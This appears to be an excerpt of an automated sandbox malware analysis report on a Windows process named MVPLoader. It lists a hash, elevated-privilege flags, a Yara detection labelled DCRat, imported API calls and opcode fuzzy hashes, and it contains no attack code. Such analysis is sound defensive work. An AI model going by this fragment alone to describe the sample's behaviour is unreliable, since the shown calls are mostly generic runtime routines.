                                                File size:3'550'208 bytes
                                                MD5 hash:53758CEA18D59182A809208313D5042A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000002C.00000002.3632602400.000000000290D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Has exited:true

                                                  APIs
                                                  • AttachConsole.KERNEL32 ref: 00007FF7605B2217
                                                  • IsDebuggerPresent.KERNEL32 ref: 00007FF7605B2221
                                                  • CoInitializeEx.OLE32 ref: 00007FF7605B2257
                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7605B23B8
                                                  • GetMessageW.USER32 ref: 00007FF7605B23E7
                                                  • TranslateMessage.USER32 ref: 00007FF7605B23F6
                                                  • DispatchMessageW.USER32 ref: 00007FF7605B2401
                                                  • GetMessageW.USER32 ref: 00007FF7605B2414
                                                  • CoUninitialize.OLE32 ref: 00007FF7605B241E
                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7605B2525
                                                    • Part of subcall function 00007FF7605B2990: AllocConsole.KERNEL32(?,?,?,?,00007FF7605B2230), ref: 00007FF7605B2994
                                                    • Part of subcall function 00007FF7605B2990: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF7605B2230), ref: 00007FF7605B29A7
                                                    • Part of subcall function 00007FF7605B2990: freopen_s.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF7605B2230), ref: 00007FF7605B29C3
                                                    • Part of subcall function 00007FF7605B2990: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF7605B2230), ref: 00007FF7605B29D2
                                                    • Part of subcall function 00007FF7605B2990: _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF7605B2230), ref: 00007FF7605B29DB
                                                    • Part of subcall function 00007FF7605B2990: _dup2.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF7605B2230), ref: 00007FF7605B29E8
                                                    • Part of subcall function 00007FF7605B2990: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF7605B2230), ref: 00007FF7605B29F3
                                                    • Part of subcall function 00007FF7605B2990: freopen_s.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF7605B2230), ref: 00007FF7605B2A0F
                                                    • Part of subcall function 00007FF7605B2990: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF7605B2230), ref: 00007FF7605B2A1E
                                                    • Part of subcall function 00007FF7605B2990: _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF7605B2230), ref: 00007FF7605B2A27
                                                    • Part of subcall function 00007FF7605B2990: _dup2.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF7605B2230), ref: 00007FF7605B2A34
                                                    • Part of subcall function 00007FF7605B2990: ?sync_with_stdio@ios_base@std@@SA_N_N@Z.MSVCP140(?,?,?,?,00007FF7605B2230), ref: 00007FF7605B2A3C
                                                    • Part of subcall function 00007FF7605B2990: FlutterDesktopResyncOutputStreams.FLUTTER_WINDOWS(?,?,?,?,00007FF7605B2230), ref: 00007FF7605B2A42
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4075755289.00007FF7605B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7605B0000, based on PE: true
                                                  • Associated: 00000002.00000002.4075558427.00007FF7605B0000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.4075926513.00007FF7605BF000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.4076140103.00007FF7605C0000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.4076280901.00007FF7605C5000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.4076399513.00007FF7605C7000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff7605b0000_MVPLoader.jbxd
                                                  Similarity
                                                  • API ID: Message__acrt_iob_func$Console_dup2_fileno_invalid_parameter_noinfo_noreturnfreopen_s$?sync_with_stdio@ios_base@std@@AllocAttachDebuggerDesktopDispatchFlutterInitializeOutputPresentResyncStreamsTranslateUninitialize
                                                  • String ID: MVPLoader$data
                                                  • API String ID: 3205443371-1987692941
                                                  • Opcode ID: 0db85800ba851b8736b0c42bf802bb82b8ff773d3e7f17a56fa306fb409dcf05
                                                  • Instruction ID: c6b7801903681abc71a69c331d18e611456f6b4a5352be98df365f35bfb172ce
                                                  • Opcode Fuzzy Hash: 0db85800ba851b8736b0c42bf802bb82b8ff773d3e7f17a56fa306fb409dcf05
                                                  • Instruction Fuzzy Hash: 97A18572A18A86C1EB10AB34E4647ADA361FB45794F904231EA9D07BDADF7CF584C720
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Similarity
                                                  • API ID: #413Zoomed
                                                  • String ID:
                                                  • API String ID: 599385055-0
                                                  • Opcode ID: 7c6b68c11e0ea8879cbe58b615476f028679247ebeda1f9cf46e4975f0145be9
                                                  • Instruction ID: 707b9cf9ddd4f8a29536798c1e87185071d520aa290e7f5fba1c48e1a560a41d
                                                  • Opcode Fuzzy Hash: 7c6b68c11e0ea8879cbe58b615476f028679247ebeda1f9cf46e4975f0145be9
                                                  • Instruction Fuzzy Hash: 93513671D0C306CAFA60BB55A968B78E790AF04795FC88039C90E523E3DF7DB5858A30
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Similarity
                                                  • API ID: Window$LibraryLongProc$AddressFreeLoad
                                                  • String ID: EnableNonClientDpiScaling$User32.dll
                                                  • API String ID: 4038316984-3360098728
                                                  • Opcode ID: 0deed3525de6556a72330e0eb43d994e4c463833a0f9993382e6288c7714ea49
                                                  • Instruction ID: c5269c008b40e18d6102c525e03b53f0b865ce4c792171099cd02a7b81fb3426
                                                  • Opcode Fuzzy Hash: 0deed3525de6556a72330e0eb43d994e4c463833a0f9993382e6288c7714ea49
                                                  • Instruction Fuzzy Hash: 05117F29A09B46C2EA10EF16B818929F3A0BF89FD0F884435DD4E13766DF3CF4458310
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Similarity
                                                  • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 313767242-0
                                                  • Opcode ID: b848698c50f38a8fa3d14d0ac47d8229b46266256726a31ac9501e55a16a132a
                                                  • Instruction ID: 5c8cb148bfcc6e1c23e971bb1e5cc1be0b2b1220f39bf06272e1bdc5e945aa35
                                                  • Opcode Fuzzy Hash: b848698c50f38a8fa3d14d0ac47d8229b46266256726a31ac9501e55a16a132a
                                                  • Instruction Fuzzy Hash: E7316276609B85C5EB60AF64E8947EDB360FB44704F44403ADA4E47B96EF3CE548C720
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Similarity
                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                  • String ID:
                                                  • API String ID: 2933794660-0
                                                  • Opcode ID: 041af0cdf31b537727a92d816ff4ed52b43694a07b4bfe3ea348fdce870c8b31
                                                  • Instruction ID: c28faa8d7e5e3eb88f7d125b0acf162ba43eb9633a42e294508fdc817ab3c416
                                                  • Opcode Fuzzy Hash: 041af0cdf31b537727a92d816ff4ed52b43694a07b4bfe3ea348fdce870c8b31
                                                  • Instruction Fuzzy Hash: C4114C26B14B01CAEB009B64E8656B873A4FB19758F840E35DA6D827A5DF38E1948350
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a16ccc6eb8c9ecaabbb3113d36633e4e51c475e292a91614fd0349849997c0bd
                                                  • Instruction ID: 322d0e432f718c6757e4dd40262ae49d2be3be4f4d8cf268f2fdd089e85777f6
                                                  • Opcode Fuzzy Hash: a16ccc6eb8c9ecaabbb3113d36633e4e51c475e292a91614fd0349849997c0bd
                                                  • Instruction Fuzzy Hash: 5CA00125948846D0E614AB08A864930A234AB51300B944071E00E51262AF3CB500C320
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ?width@ios_base@std@@QEBA_JXZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B36F3
                                                  • ?width@ios_base@std@@QEBA_JXZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B3708
                                                  • ?width@ios_base@std@@QEBA_JXZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B371D
                                                  • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBAPEAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B373D
                                                  • ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B375C
                                                  • ?tie@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBAPEAV?$basic_ostream@DU?$char_traits@D@std@@@2@XZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B3770
                                                  • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B3783
                                                  • ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B3793
                                                  • ?flags@ios_base@std@@QEBAHXZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B37BA
                                                  • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBAPEAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B37DA
                                                  • ?fill@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBADXZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B37ED
                                                  • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B37F9
                                                  • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBAPEAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B3816
                                                  • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B3825
                                                  • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBAPEAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B384A
                                                  • ?fill@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBADXZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B385D
                                                  • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B3869
                                                  • ?width@ios_base@std@@QEAA_J_J@Z.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B3896
                                                  • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B38AC
                                                  • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B38B6
                                                  • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBAPEAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B38C7
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4075755289.00007FF7605B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7605B0000, based on PE: true
                                                  • Associated: 00000002.00000002.4075558427.00007FF7605B0000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.4075926513.00007FF7605BF000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.4076140103.00007FF7605C0000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.4076280901.00007FF7605C5000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.4076399513.00007FF7605C7000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff7605b0000_MVPLoader.jbxd
                                                  Similarity
                                                  • API ID: U?$char_traits@$D@std@@@std@@$D@std@@@2@$?rdbuf@?$basic_ios@V?$basic_streambuf@$?width@ios_base@std@@$?fill@?$basic_ios@?good@ios_base@std@@?sputc@?$basic_streambuf@$?flags@ios_base@std@@?flush@?$basic_ostream@?setstate@?$basic_ios@?sputn@?$basic_streambuf@?tie@?$basic_ios@Osfx@?$basic_ostream@V12@V?$basic_ostream@
                                                  • String ID:
                                                  • API String ID: 3703345220-0
                                                  • Opcode ID: 51a1bd9b16cdd61ddd8cc5ac7860404afae2a6773f71a1b433e9ee2371b47c5c
                                                  • Instruction ID: daee7205c1a8316a9175596b6dbf1ea16374cfabc0df9afa73747c9655021c12
                                                  • Opcode Fuzzy Hash: 51a1bd9b16cdd61ddd8cc5ac7860404afae2a6773f71a1b433e9ee2371b47c5c
                                                  • Instruction Fuzzy Hash: B4616E65A09A41C2EF24AF1DE5A4A38E760FF85F91B888931DA4E57792CF3CF006C315
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ?width@ios_base@std@@QEBA_JXZ.MSVCP140 ref: 00007FF7605B6F7D
                                                  • ?width@ios_base@std@@QEBA_JXZ.MSVCP140 ref: 00007FF7605B6F92
                                                  • ?width@ios_base@std@@QEBA_JXZ.MSVCP140 ref: 00007FF7605B6FA7
                                                  • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBAPEAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP140 ref: 00007FF7605B6FC7
                                                  • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7605B6FE6
                                                  • ?tie@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBAPEAV?$basic_ostream@DU?$char_traits@D@std@@@2@XZ.MSVCP140 ref: 00007FF7605B6FFA
                                                  • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7605B700D
                                                  • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7605B701D
                                                  • ?flags@ios_base@std@@QEBAHXZ.MSVCP140 ref: 00007FF7605B7043
                                                  • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBAPEAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP140 ref: 00007FF7605B706A
                                                  • ?fill@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBADXZ.MSVCP140 ref: 00007FF7605B707D
                                                  • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF7605B7089
                                                  • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBAPEAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP140 ref: 00007FF7605B70A4
                                                  • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140 ref: 00007FF7605B70B3
                                                  • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBAPEAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP140 ref: 00007FF7605B70DA
                                                  • ?fill@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBADXZ.MSVCP140 ref: 00007FF7605B70ED
                                                  • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF7605B70F9
                                                  • ?width@ios_base@std@@QEAA_J_J@Z.MSVCP140 ref: 00007FF7605B7122
                                                  • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7605B7137
                                                  • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF7605B7141
                                                  • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBAPEAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP140 ref: 00007FF7605B7152
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4075755289.00007FF7605B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7605B0000, based on PE: true
                                                  • Associated: 00000002.00000002.4075558427.00007FF7605B0000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.4075926513.00007FF7605BF000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.4076140103.00007FF7605C0000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.4076280901.00007FF7605C5000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.4076399513.00007FF7605C7000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff7605b0000_MVPLoader.jbxd
                                                  Similarity
                                                  • API ID: U?$char_traits@$D@std@@@std@@$D@std@@@2@$?rdbuf@?$basic_ios@V?$basic_streambuf@$?width@ios_base@std@@$?fill@?$basic_ios@?good@ios_base@std@@?sputc@?$basic_streambuf@$?flags@ios_base@std@@?flush@?$basic_ostream@?setstate@?$basic_ios@?sputn@?$basic_streambuf@?tie@?$basic_ios@Osfx@?$basic_ostream@V12@V?$basic_ostream@
                                                  • String ID:
                                                  • API String ID: 3703345220-0
                                                  • Opcode ID: 6032fbfd645aa7f30a91e1ad0e336ebd58a8a148f04c2cc15f7a21850a397b76
                                                  • Instruction ID: 05224e2de6d33e392bf7ad838acb79996683de363ff3cc0f7993872b93faef49
                                                  • Opcode Fuzzy Hash: 6032fbfd645aa7f30a91e1ad0e336ebd58a8a148f04c2cc15f7a21850a397b76
                                                  • Instruction Fuzzy Hash: 3B61FF26A48A4AC1DB14AF29E574739A760FF85F95B899831CA0E43766CF3CF405C714
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • AllocConsole.KERNEL32(?,?,?,?,00007FF7605B2230), ref: 00007FF7605B2994
                                                  • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF7605B2230), ref: 00007FF7605B29A7
                                                  • freopen_s.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF7605B2230), ref: 00007FF7605B29C3
                                                  • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF7605B2230), ref: 00007FF7605B29D2
                                                  • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF7605B2230), ref: 00007FF7605B29DB
                                                  • _dup2.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF7605B2230), ref: 00007FF7605B29E8
                                                  • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF7605B2230), ref: 00007FF7605B29F3
                                                  • freopen_s.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF7605B2230), ref: 00007FF7605B2A0F
                                                  • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF7605B2230), ref: 00007FF7605B2A1E
                                                  • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF7605B2230), ref: 00007FF7605B2A27
                                                  • _dup2.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00007FF7605B2230), ref: 00007FF7605B2A34
                                                  • ?sync_with_stdio@ios_base@std@@SA_N_N@Z.MSVCP140(?,?,?,?,00007FF7605B2230), ref: 00007FF7605B2A3C
                                                  • FlutterDesktopResyncOutputStreams.FLUTTER_WINDOWS(?,?,?,?,00007FF7605B2230), ref: 00007FF7605B2A42
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.4075755289.00007FF7605B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7605B0000, based on PE: true
                                                  • Associated: 00000002.00000002.4075558427.00007FF7605B0000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.4075926513.00007FF7605BF000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.4076140103.00007FF7605C0000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.4076280901.00007FF7605C5000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.4076399513.00007FF7605C7000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff7605b0000_MVPLoader.jbxd
                                                  Similarity
                                                  • API ID: __acrt_iob_func$_dup2_filenofreopen_s$?sync_with_stdio@ios_base@std@@AllocConsoleDesktopFlutterOutputResyncStreams
                                                  • String ID: CONOUT$
                                                  • API String ID: 396801638-3130406586
                                                  • Opcode ID: f118a68f80fba26191b39fc65b3ebc6219501ab17b230a5cf0f8945e069e041f
                                                  • Instruction ID: 03183213762f69e2d0619e535fbfc44c50d96048eb14d55f5e367b4308d0dc22
                                                  • Opcode Fuzzy Hash: f118a68f80fba26191b39fc65b3ebc6219501ab17b230a5cf0f8945e069e041f
                                                  • Instruction Fuzzy Hash: 8B11A828A48A43D6EB447B65E838ABAA3A1EF44B55FC00075C50E433A3DF6CB589C371
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00007FF7605B36B0: ?width@ios_base@std@@QEBA_JXZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B36F3
                                                    • Part of subcall function 00007FF7605B36B0: ?width@ios_base@std@@QEBA_JXZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B3708
                                                    • Part of subcall function 00007FF7605B36B0: ?width@ios_base@std@@QEBA_JXZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B371D
                                                    • Part of subcall function 00007FF7605B36B0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBAPEAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B373D
                                                    • Part of subcall function 00007FF7605B36B0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B375C
                                                    • Part of subcall function 00007FF7605B36B0: ?tie@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBAPEAV?$basic_ostream@DU?$char_traits@D@std@@@2@XZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B3770
                                                    • Part of subcall function 00007FF7605B36B0: ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B3783
                                                    • Part of subcall function 00007FF7605B36B0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B3793
                                                    • Part of subcall function 00007FF7605B36B0: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B38AC
                                                    • Part of subcall function 00007FF7605B36B0: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B38B6
                                                    • Part of subcall function 00007FF7605B36B0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBAPEAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B38C7
                                                  • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7605BB170
                                                  • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7605BB1E8
                                                  • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7605BB25E
                                                  • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7605BB2D9
                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7605BB3BD
                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7605BB417
                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7605BB48A
                                                    • Part of subcall function 00007FF7605B36B0: ?flags@ios_base@std@@QEBAHXZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B37BA
                                                    • Part of subcall function 00007FF7605B36B0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBAPEAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B37DA
                                                    • Part of subcall function 00007FF7605B36B0: ?fill@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBADXZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B37ED
                                                    • Part of subcall function 00007FF7605B36B0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B37F9
                                                    • Part of subcall function 00007FF7605B36B0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBAPEAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B3816
                                                    • Part of subcall function 00007FF7605B36B0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B3825
                                                    • Part of subcall function 00007FF7605B36B0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBAPEAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP140(?,?,?,00000000,?,00007FF7605B4047,?,?,?,00000000,?,00007FF7605B18D8), ref: 00007FF7605B384A
